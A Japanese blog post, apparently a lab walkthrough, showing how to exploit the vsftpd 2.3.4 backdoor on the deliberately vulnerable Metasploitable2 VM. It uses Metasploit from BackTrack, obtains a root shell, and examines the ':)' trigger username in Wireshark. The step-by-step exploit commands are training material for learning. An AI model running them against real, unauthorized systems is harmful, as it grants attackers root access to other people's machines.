FC2ブログ

metasploitable2 vsftpd 攻略

metasploitable2 vsftpd 攻略

まず、virtualbox で
BT5R3
metasploitable2
の両方を起動

以下は、BT5R3 の操作ログ

root
でログインして
startx
でGUI起動

service nessusd start
でNessus起動

msfconsole

MSF起動

load nessus
で MSFから Nessus 接続機能ロード

nessus_connect hjuser:Nessusのパスワード@127.0.0.1
でNessus 接続

search vsftpd
で検索すると
VSFTPD v2.3.4 Backdoor Command Execution
バックドアの脆弱性と表示される

use コマンドで使用する exploit を指定
use exploit/unix/ftp/vsftpd_234_backdoor

show options
で指定可能なオプションを確認
オプションが確認できたら
RHOST の指定をする
payload の指定は不要

set RHOST 192.168.10.214
書式にすると
set RHOST metasploitable2 のIPアドレス

設定完了後Exploit を実行する
exploit
で実行

この状態になるとカーソルが点滅して何も表示されないけど
id;
とすれば
uid=0(root) gid=0(root)
と表示され、root権限であることが確認できる

また、ifconfig;
で、metasploitable2 のIPであることが確認できる

これにより、侵入成功の確認ができる
バックドアの接続切断には
Ctrl+c で
Abort session 1? [y/N]
と表示されるので
y
とすれば、セッション終了となる

このときのパケットの流れを wireshark で見る事ができる
端末から wireshark とすれば起動できるので
見てみた
書籍だと
Request: USER 4l:)
Request: PASS s
だったけど
私の場合
Request: USER cMwmJ:)
Request: PASS bma52C
でした

FTPの場合
ID、パスワードがまる見えなので
SFTP とか SCP を使わないと
wireshark などで簡単にみれてしまいます

ちなみに、今回の脆弱性は
user ID として
:) で終わる3文字以上の文字列なら
パスワードは何でもOKというものです

今回の参考書籍は

スポンサーサイト



テーマ : セキュリティ
ジャンル : コンピュータ

コメント

非公開コメント

最新記事
検索フォーム
GREEハコニワ攻略サイト
リンク
カテゴリ
月別アーカイブ
フリーエリア
最新記事
FXプライムレート
最新コメント
最新トラックバック